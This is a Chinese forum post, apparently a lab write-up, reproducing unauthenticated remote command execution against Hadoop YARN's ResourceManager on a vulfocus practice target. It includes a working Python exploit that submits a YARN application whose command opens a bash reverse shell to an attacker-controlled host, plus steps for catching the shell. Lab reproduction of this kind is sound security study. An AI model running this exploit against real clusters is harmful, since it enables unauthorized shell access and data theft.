hadoop未授权访问下令执行漏洞复现-vulfocus

打印 上一主题 下一主题

主题 530|帖子 530|积分 1605

1 先容

Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的焦点组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞,可能答应未经认证的用户访问或操作集群资源,这可能会导致数据走漏、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了未授权访问漏洞
2 涉及版本

hadoop **3.3.0**以下

vulfocus上的是2.8.1版本
3 复现

vulfocus打开靶机

这个地方有映射关系,8088是hadoop的"All Applications"页面,通常不是一个单独的组件,而是Hadoop生态系统中某些组件的用户界面(UI)的一部分,它可能用于展示和管理集群中的各种应用程序。
待会我们需要使用exp对这个页面/cluster/apps进行未授权漏洞的攻击
参考exp:https://www.cnblogs.com/cute-puli/p/14944637.html
  1. `#!/usr/bin/env python  
  2.   
  3. import requests  
  4.   
  5. target = 'http://123.58.224.8:31840/'  目标网址
  6. lhost = '用来反弹的ip' # put your local host ip here, and listen at port 9999  
  7.   
  8. url = target + 'ws/v1/cluster/apps/new-application'  
  9. resp = requests.post(url)  
  10. app_id = resp.json()['application-id']  
  11. url = target + 'ws/v1/cluster/apps'  
  12. data = {  
  13.     'application-id': app_id,  
  14.     'application-name': 'get-shell',  
  15.     'am-container-spec': {  
  16.         'commands': {  
  17.             'command': '/bin/bash -i >& /dev/tcp/%s/反弹到的端口号 0>&1' % lhost,  
  18.         },  
  19.     },  
  20.     'application-type': 'YARN',  
  21. }  
  22. requests.post(url, json=data)
复制代码
由于我中间出去用饭了,所从前后靶机ip有变革了
因为要反弹shell,以是你的外网机需要开一下对应的端口
这个已经有反应了,但是我外网机上面没收到,明明添加了安全组但是却没收到shell
解决:解决阿里云的端口添加安全组仍然无法扫描到-CSDN博客
要先监听到端口,这个端口绑定了服务才可以扫描和访问上

这样就可以了,已经反弹过来了
我们根据vulfocus的提示查察env情况变量,我这里是退回到根目录了


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

大连全瓷种植牙齿制作中心

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表